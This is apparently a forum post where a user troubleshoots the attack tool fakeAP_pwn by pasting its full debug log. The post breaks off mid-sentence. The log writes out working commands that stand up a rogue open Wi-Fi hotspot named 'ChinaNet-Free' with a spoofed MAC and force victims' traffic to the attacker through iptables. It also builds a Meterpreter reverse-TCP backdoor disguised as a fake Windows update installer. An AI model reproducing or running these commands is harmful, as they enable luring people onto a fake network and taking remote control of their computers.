thanks for your suggestion,here is still the same problem,Code:[*] fakeAP_pwn v0.3 (#127) display~info Debug mode [i] Debug mode display~action Analyzing: Environment [>] Analyzing: Environment display~diag Testing: Internet connection [+] Testing: Internet connection display~error Internet access: Failed [!] Internet access: Failed display~info Switching mode: non [i] Switching mode: non display~info interface=eth0 [i] wifiInterface=wlan0 [i] apInterface=at0 [i] essid=ChinaNet-Free [i] channel=1 [i] apType=airbase-ng [i] mode=non [i] payload=vnc [i] backdoorPath=/root/backdoor.exe [i] www=/var/www/fakeAP_pwn [i] respond2All=false [i] macMode=set [i] fakeMac=00:05:7c:9a:58:3f [i] extras=false [i] mtuMonitor=1800 [i] mtuAP=1400 [i] diagnostics=false [i] verbose=1 [i] debug=true [i] gateway= [i] ourIP=10.0.0.1 [i] port=14267 [i] wifiDriver=iwlagn [i] interface=eth0 [i] wifiInterface=wlan0 [i] apInterface=at0 [i] essid=ChinaNet-Free [i] channel=1 [i] apType=airbase-ng [i] mode=non [i] payload=vnc [i] backdoorPath=/root/backdoor.exe [i] www=/var/www/fakeAP_pwn [i] respond2All=false [i] macMode=set [i] fakeMac=00:05:7c:9a:58:3f [i] extras=false [i] mtuMonitor=1800 [i] mtuAP=1400 [i] diagnostics=false [i] verbose=1 [i] debug=true [i] gateway= [i] ourIP=10.0.0.1 [i] port=14267 [i] wifiDriver=iwlagn display~action Configuring: Environment [>] Configuring: Environment cleanUp~remove display~action Removing: Temp files [>] Removing: Temp files action~Removing temp files rm -rfv /root/fakeAP_pwn/tmp xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Removing temp files" -e "rm -rfv /root/fakeAP_pwn/tmp" display~action Stopping: Daemons & Programs [>] Stopping: Daemons & Programs action~Stopping killall airbase-ng hostapd xterm dhcpcd dnsmasq sbd vnc apache2 ; /etc/init.d/dhcp3-server stop ; /etc/init.d/apparmor stop ; /etc/init.d/dnsmasq stop ; /etc/init.d/apache2 stop xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Stopping" -e " killall airbase-ng hostapd xterm dhcpcd dnsmasq sbd vnc apache2 ; /etc/init.d/dhcp3-server stop ; /etc/init.d/apparmor stop ; /etc/init.d/dnsmasq stop ; /etc/init.d/apache2 stop" action~Refreshing wlan0 ifconfig wlan0 down && ifconfig wlan0 up && sleep 1 xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Refreshing wlan0" -e "ifconfig wlan0 down && ifconfig wlan0 up && sleep 1" display~action Configuring: Wireless card [>] Configuring: Wireless card action~Monitor Mode (Starting) airmon-ng start wlan0 xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Monitor Mode (Starting)" -e "airmon-ng start wlan0" display~info monitorInterface=mon0 [i] monitorInterface=mon0 action~MTU ifconfig "mon0" mtu "1800" xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - MTU" -e "ifconfig "mon0" mtu "1800"" display~action Configuring: MAC address [>] Configuring: MAC address action~Configuring MAC ifconfig mon0 down ; macchanger -m 00:05:7c:9a:58:3f mon0 ; ifconfig mon0 up xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Configuring MAC" -e "ifconfig mon0 down ; macchanger -m 00:05:7c:9a:58:3f mon0 ; ifconfig mon0 up" display~info mac=00:05:7c:9a:58:3f (Rco Security Ab) [i] mac=00:05:7c:9a:58:3f (Rco Security Ab) display~action Creating: Scripts [>] Creating: Scripts #....here is too much code display~action Creating: Exploit (Windows) [>] Creating: Exploit (Windows) action~Metasploit (Windows) /opt/metasploit3/bin/msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 R | /opt/metasploit3/bin/msfencode -x /var/www/fakeAP_pwn/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o /var/www/fakeAP_pwn/Windows-KB183905-x86-ENU.exe xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Metasploit (Windows)" -e "/opt/metasploit3/bin/msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564 R | /opt/metasploit3/bin/msfencode -x /var/www/fakeAP_pwn/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o /var/www/fakeAP_pwn/Windows-KB183905-x86-ENU.exe" display~action Creating: Access point [>] Creating: Access point action~Access Point killall airbase-ng ; sleep 1 ; airbase-ng -a 00:05:7c:9a:58:3f -W 0 -c 1 -e "ChinaNet-Free" -v mon0 true 0|0|4 xterm -geometry 84x4+0+0 -T "fakeAP_pwn v0.3 (#127) - Access Point" -e "killall airbase-ng ; sleep 1 ; airbase-ng -a 00:05:7c:9a:58:3f -W 0 -c 1 -e "ChinaNet-Free" -v mon0" display~action Configuring: Network [>] Configuring: Network action~Setting up at0 ifconfig lo up ; ifconfig at0 10.0.0.1 netmask 255.255.255.0 ; ifconfig at0 mtu 1400 ; ifconfig mon0 mtu 1800 ; route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 at0 ; echo "1" > /proc/sys/net/ipv4/ip_forward xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - Setting up at0" -e "ifconfig lo up ; ifconfig at0 10.0.0.1 netmask 255.255.255.0 ; ifconfig at0 mtu 1400 ; ifconfig mon0 mtu 1800 ; route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 at0 ; echo "1" > /proc/sys/net/ipv4/ip_forward" ipTables~clear action~iptables iptables -F ; iptables -X ; iptables -t filter -F ; iptables -t filter -X ; iptables -t filter -Z ; iptables -t nat -F ; iptables -t nat -X ; iptables -t nat -Z ; iptables -t mangle -F ; iptables -t mangle -X ; iptables -t mangle -Z xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - iptables" -e "iptables -F ; iptables -X ; iptables -t filter -F ; iptables -t filter -X ; iptables -t filter -Z ; iptables -t nat -F ; iptables -t nat -X ; iptables -t nat -Z ; iptables -t mangle -F ; iptables -t mangle -X ; iptables -t mangle -Z" ipTables~force at0 action~iptables iptables --table nat --append PREROUTING --in-interface at0 --proto tcp --jump DNAT --to 10.0.0.1 ; iptables --table nat --append PREROUTING --in-interface at0 --jump REDIRECT ; iptables --table nat --append PREROUTING --in-interface at0 -m limit --liit 1/second --jump LOG --log-prefix "fakeAP_pwn (PREROUTING): " --log-level 7 xterm -geometry 84x15+100+0 -T "fakeAP_pwn v0.3 (#127) - iptables" -e "iptables --table nat --append PREROUTING --in-interface at0 --proto tcp --jump DNAT --to 10.0.0.1 ; iptables --table nat --append PREROUTING --in-interface at0 --jump REDIRECT ; iptables --table nat --append PREROUTING --in-interface at0 -m limit --liit 1/second --jump LOG --log-prefix "fakeAP_pwn (PREROUTING): " --log-level 7" display~action Configuring: Permissions



but today i use it again but

